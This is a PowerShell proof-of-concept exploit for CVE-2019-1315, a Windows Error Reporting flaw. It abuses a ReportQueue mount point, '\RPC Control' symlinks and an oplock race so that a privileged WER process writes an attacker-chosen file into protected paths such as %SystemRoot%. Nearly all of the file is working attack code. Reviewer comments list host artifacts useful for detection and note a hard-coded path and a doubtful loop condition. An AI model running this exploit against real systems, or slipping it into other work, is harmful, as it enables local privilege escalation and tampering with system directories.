cve-2019-1315.ps1
# Loads NtApiDotNet from a hard-coded, user-specific absolute path; with
# -ErrorAction Stop the script aborts here when run from any other location.
Import-Module "C:\Users\Zhang Yuan\Desktop\CVE-2019-1315-master\NtApiDotNet.dll" -ErrorAction Stop
# Staging directory for the Report.wer copies. Invoke-MoveFileUsingWER creates it
# and removes it in its cleanup step; if a run aborts partway, %SystemRoot%\Temp\RQ
# is a leftover artifact worth noting during triage.
$TempReportDir = "$env:SystemRoot\Temp\RQ"
<#
.SYNOPSIS
Proof-of-concept for the WER report-queue link issue tracked as CVE-2019-1315
(per the file name): redirects the report files WER processes so that $Source
ends up at $Destination.
.DESCRIPTION
Stages two copies of Report.wer under $TempReportDir, turns the ReportQueue
sub-directory "a_b_c_d_e" into a mount point onto the "\RPC Control" object
directory, and publishes object-manager symlinks there named Report.wer and
Report.wer.tmp. An exclusive oplock on the staged .tmp file is awaited; its
break indicates another process has opened that file, after which the links
are re-pointed to $Destination / $Source before the oplock is acknowledged.
Host-level artifacts a defender can look for: a reparse point at
%ProgramData%\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e, a staging directory
%SystemRoot%\Temp\RQ, and a child powershell.exe whose command line calls
[Environment]::FailFast to produce the crash report. Everything except the
moved file is removed in the cleanup section at the end of the function.
.PARAMETER Source
Path of the file to be moved; wrapped as "\??\$Source" for the NT symlink.
.PARAMETER Destination
Path the file should appear at; neither the path nor its parent is validated here.
.NOTES
Reads the script-level $TempReportDir. There is no try/finally around the NT
calls, so a failure partway through can leave the mount point, symlinks and
staging directory in place.
#>
function Invoke-MoveFileUsingWER($Source, $Destination) {
Write-Host "Setting up dirs & files..."
# Staging directory plus two identical copies of the bundled Report.wer;
# the copies are loaded from the same hard-coded path as the DLL at the top.
New-Item -Type Directory -Path $TempReportDir -Force | Out-Null
Copy-Item "C:\Users\Zhang Yuan\Desktop\CVE-2019-1315-master\Report.wer" "$TempReportDir\Report.wer" -ErrorAction Stop
Copy-Item "C:\Users\Zhang Yuan\Desktop\CVE-2019-1315-master\Report.wer" "$TempReportDir\Report.wer.tmp" -ErrorAction Stop
Write-Host "Setting up pseudo-symlinks..."
# Mount point in the per-machine WER ReportQueue pointing at "\RPC Control",
# then object-manager symlinks for the two report file names that resolve to
# the staged copies. The reparse point is the most durable on-disk indicator.
[NtApiDotNet.NtFile]::CreateMountPoint("\??\$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e", "\RPC Control", $null)
$wer = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer", "\??\$TempReportDir\Report.wer")
$wer_tmp = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer.tmp", "\??\$TempReportDir\Report.wer.tmp")
# Open the staged .tmp for attribute reads only, with full sharing, so the
# oplock below can be placed without blocking other openers.
$tmp_file = [NtApiDotNet.NtFile]::Open("\??\$TempReportDir\Report.wer.tmp", $null, [NtApiDotNet.FileAccessRights]::ReadAttributes, [NtApiDotNet.FileShareMode]::All, [NtApiDotNet.FileOpenOptions]::None)
Write-Host "Placing oplock..."
$task = $tmp_file.OplockExclusiveAsync()
Write-Host "Triggering WER..."
# Spawns a child powershell.exe that terminates itself via FailFast; the
# resulting crash report is what drives WER into the ReportQueue path above.
Start-Process -NoNewWindow powershell.exe "-Command `"[Environment]::FailFast('Error')`""
Write-Host "Waiting for oplock to trigger..."
# Blocks until the oplock breaks, i.e. until something else opens Report.wer.tmp.
$task.Wait()
Write-Host "Oplock triggered, switching symlinks..."
# Drop the staging links and re-point the same two names at the caller's paths.
$wer.Dispose()
$wer_tmp.Dispose()
$wer = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer", "\??\$Destination")
$wer_tmp = [NtApiDotNet.NtSymbolicLink]::Create("\RPC Control\Report.wer.tmp", "\??\$Source")
Write-Host "Releasing Oplock..."
$tmp_file.AcknowledgeOplock([NtApiDotNet.OplockAcknowledgeLevel]::No2)
Write-Host "Waiting for wemgr process to finish..."
Sleep -Seconds 1
# Polls for a process named "wemgr" (spelled as written here).
# NOTE(review): -not binds tighter than -eq, so this compares a [bool] with
# $null rather than testing the Get-Process result for null directly; confirm
# the loop condition behaves as intended.
While ( -not (Get-Process -Name wemgr -ErrorAction SilentlyContinue) -eq $null ) {
Sleep -Milliseconds 500
}
Write-Host "Cleanup..."
# Tear down in reverse order: handle, symlinks, reparse point, directory,
# staging directory. None of this runs if an earlier statement threw.
$tmp_file.Close()
$wer.Dispose()
$wer_tmp.Dispose()
[NtApiDotNet.NtFile]::DeleteReparsePoint("\??\$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e") | Out-Null
Remove-Item -Path "$env:ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e" -Force
Remove-Item -Path $TempReportDir -Recurse -Force
}
<#
.SYNOPSIS
Returns $True when $Path can be opened for writing, $False otherwise.
.DESCRIPTION
Probes by calling [IO.File]::OpenWrite and closing the handle immediately.
Any exception from the open or the close yields $False. Note that OpenWrite
creates the file when it does not yet exist and the directory permits it,
so a $True result does not by itself prove the file existed beforehand.
.PARAMETER Path
File system path to probe.
.OUTPUTS
[bool]
#>
function Test-IsFileWritable($Path) {
    try {
        $handle = [IO.File]::OpenWrite($Path)
        $handle.close()
        return $True
    } catch {
        return $False
    }
}
# Use the bug to create a file in the Windows directory
<#
.SYNOPSIS
Demonstration wrapper: stages a marker file under %SystemRoot%\Temp and calls
Invoke-MoveFileUsingWER to place it at $TargetFile.
.PARAMETER TargetFile
Destination path; defaults to "$env:SystemRoot\evil.txt" when omitted or $null.
The function returns early with a warning if the path already exists.
.OUTPUTS
On success, the FileInfo for $TargetFile (from Get-Item); otherwise nothing.
.NOTES
Success leaves the file at $TargetFile, which is the main post-run artifact.
The staged source %SystemRoot%\Temp\testfile is removed only on the failure
branch. The success check relies on Test-IsFileWritable, which uses
[IO.File]::OpenWrite and can itself create a missing file where the directory
is writable, so it does not distinguish "placed by WER" from "created by the
check".
#>
function Test-Exploit($TargetFile) {
if($TargetFile -eq $null) {
$TargetFile = "$env:SystemRoot\evil.txt"
}
if(Test-Path $TargetFile) {
Write-Warning "Target file already exists, exiting"
return
}
# Marker file with known content so the result at $TargetFile is recognizable.
New-Item -Type File -Path "$env:SystemRoot\Temp\testfile" -Value "test" -ErrorAction Stop | Out-Null
Invoke-MoveFileUsingWER -Source "$env:SystemRoot\Temp\testfile" -Destination $TargetFile
if (Test-IsFileWritable($TargetFile)) {
Write-Host -ForegroundColor Green "File $TargetFile successfully created!"
Get-Item $TargetFile
} else {
Write-Warning "File not created or not writable."
# Best-effort removal of the staged source; errors are deliberately ignored.
Remove-Item -Path "$env:SystemRoot\Temp\testfile" -Force -ErrorAction SilentlyContinue
}
}